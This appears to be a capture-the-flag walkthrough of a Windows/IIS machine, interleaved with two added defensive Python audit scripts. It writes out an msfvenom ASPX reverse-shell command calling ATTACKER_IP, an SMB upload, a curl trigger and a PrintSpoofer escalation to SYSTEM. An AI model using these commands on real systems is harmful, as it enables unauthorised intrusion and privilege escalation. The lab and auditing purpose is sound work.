Relevant
MSFVENOM
- Generating the payload with MSFvenom; afterwards we can upload it to the SMB share.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -f aspx > Rev_ASPX.aspx
SMB
- Uploading the reverse shell using SMB.
smb: \> put Rev_ASPX.aspx
Privilege Escalation
- We can execute the reverse shell by navigating to the target URL in a browser, or from the command line with curl or any other alternative. The share is also exposed by IIS under the same name, so requesting the uploaded .aspx page makes the web server execute it.
attacker@machine:~$ curl "10.10.180.65:49663/nt4wrksv/Rev_ASPX.aspx"
- We can catch the reverse shell using netcat.
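The weakness the two steps above rely on is that the same directory is both a writable SMB share and an IIS application root, so anything a share user drops there with a server-side extension is run by the web server. The following audit script is an added example, not part of the original writeup: it lists every file under a share root that IIS would hand to a script handler rather than serve as static content. The share root path in the constructed sample listing is an assumption; the page does not say where nt4wrksv lives on disk.

```python
"""Audit a directory that is both an SMB share and an IIS application root.

Added example (not from the original writeup): lists every file in the tree
that IIS would hand to a script handler instead of serving as static content.
Any such file in a share that untrusted users can write to is code execution
as the application-pool identity. The share root path used in the sample
listing is an assumption; the page does not state where nt4wrksv lives.
"""
import os
from typing import Dict, Iterable, List, Optional

# Extensions that IIS / ASP.NET hands to a script handler instead of serving as static content.
SERVER_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx", ".asax"}
# A web.config in the directory can remap handlers or relax execution settings.
HANDLER_CONFIG = {"web.config"}


def basename_any(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def classify(path: str) -> Optional[str]:
    """Return a finding kind for the path, or None if it is harmless static content."""
    name = basename_any(path).lower()
    ext = os.path.splitext(name)[1]
    if ext in SERVER_EXECUTABLE:
        return "server-executable"
    if name in HANDLER_CONFIG:
        return "handler-config"
    return None


def audit_paths(paths: Iterable[str]) -> List[Dict[str, str]]:
    """Classify an iterable of file paths; returns only the files worth flagging."""
    findings = []
    for path in paths:
        kind = classify(path)
        if kind is not None:
            findings.append({"path": path, "kind": kind})
    return findings


def audit_directory(root: str) -> List[Dict[str, str]]:
    """Walk a real share root on disk and audit everything below it."""
    paths = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            paths.append(os.path.join(dirpath, filename))
    return audit_paths(sorted(paths))


# Constructed listing modelled on the nt4wrksv share; the root path is assumed.
SAMPLE_LISTING = [
    r"C:\inetpub\wwwroot\nt4wrksv\quarterly_report.xlsx",
    r"C:\inetpub\wwwroot\nt4wrksv\Rev_ASPX.aspx",
    r"C:\inetpub\wwwroot\nt4wrksv\notes\readme.md",
    r"C:\inetpub\wwwroot\nt4wrksv\web.config",
    r"C:\inetpub\wwwroot\nt4wrksv\logo.png",
]

if __name__ == "__main__":
    for finding in audit_paths(SAMPLE_LISTING):
        print(f"{finding['kind']:18} {finding['path']}")
```

Run audit_directory against the real share root on the server; any hit means a share writer can execute code as the application-pool identity, and the fix is to stop serving the share from IIS or to make the share read-only for everyone except the people who maintain the site.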
- These privileges allow a process to impersonate other users and act on their behalf: SeImpersonate and SeAssignPrimaryToken. We can use PrintSpoofer to accomplish this task.
c:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
[..]
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
[..]
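The listing above is the check worth automating on every service account: parse the table that whoami /priv prints and report the privileges that let a process act as someone else. The script below is an added example, not part of the original writeup; the sample output is constructed, modelled on the page's listing and a default IIS application-pool token, and the high-risk privilege list and reason strings are the author of this example's choice, not something the page defines.

```python
"""Parse `whoami /priv` output and flag privileges that matter for escalation.

Added example (not from the original writeup): the parser reads the table
format shown on the page and the checker reports privileges that let a
process act as another user. The sample output is constructed, modelled on
the page's listing and the usual IIS application-pool identity.
"""
from typing import Dict, List

# Privileges a defender should not see on a service account exposed to attackers.
# The reason strings summarise why each one matters; the list is this example's choice.
HIGH_RISK = {
    "SeImpersonatePrivilege": "can impersonate any client that connects to it (PrintSpoofer-style abuse)",
    "SeAssignPrimaryTokenPrivilege": "can start a process under another user's primary token",
    "SeDebugPrivilege": "can open and manipulate any process, including SYSTEM ones",
    "SeBackupPrivilege": "can read any file regardless of ACLs",
    "SeRestorePrivilege": "can write any file regardless of ACLs",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
    "SeLoadDriverPrivilege": "can load kernel drivers",
}


def parse_whoami_priv(text: str) -> Dict[str, Dict[str, str]]:
    """Return {privilege name: {"description": ..., "state": ...}} from `whoami /priv` output.

    Rows start after the '=====' separator line; the name is the first token,
    the state (Enabled/Disabled) the last, and the description is everything between.
    """
    privileges: Dict[str, Dict[str, str]] = {}
    in_table = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line:
            continue
        parts = line.split()
        if len(parts) < 3 or parts[-1] not in ("Enabled", "Disabled"):
            continue  # elision markers such as [..] or stray text
        privileges[parts[0]] = {
            "description": " ".join(parts[1:-1]),
            "state": parts[-1],
        }
    return privileges


def flag_high_risk(privileges: Dict[str, Dict[str, str]]) -> List[Dict[str, str]]:
    """List held high-risk privileges in table order.

    A Disabled privilege is still held by the token: the process can turn it on
    with AdjustTokenPrivileges, so the state is reported but does not clear the finding.
    """
    return [
        {"name": name, "state": info["state"], "reason": HIGH_RISK[name]}
        for name, info in privileges.items()
        if name in HIGH_RISK
    ]


# Constructed sample, modelled on the page's listing and a default IIS app-pool token.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for finding in flag_high_risk(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{finding['name']:30} {finding['state']:8} {finding['reason']}")
```

The point of reporting Disabled entries as findings is the caveat in the docstring: the SeAssignPrimaryTokenPrivilege row on the page reads Disabled, but the token still holds it and the process can enable it at will, so only removing the privilege from the account (or running the site under a lower-privileged identity) closes the path.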
SMB
- Using a Python SMB server to transfer files to the target machine.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare
- Copying PrintSpoofer64 from our SMB server to the target machine.
C:\Windows\Temp> copy \\$ATTACKER_IP\LINUXSHARE\PrintSpoofer64.exe PrintSpoofer64.exe
Exploitation
- Executing the PrintSpoofer64.exe binary. It might be necessary to run PrintSpoofer multiple times before it succeeds.
- We have System Rights: NT AUTHORITY\SYSTEM
C:\Windows\Temp> PrintSpoofer64.exe -i -c powershell
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system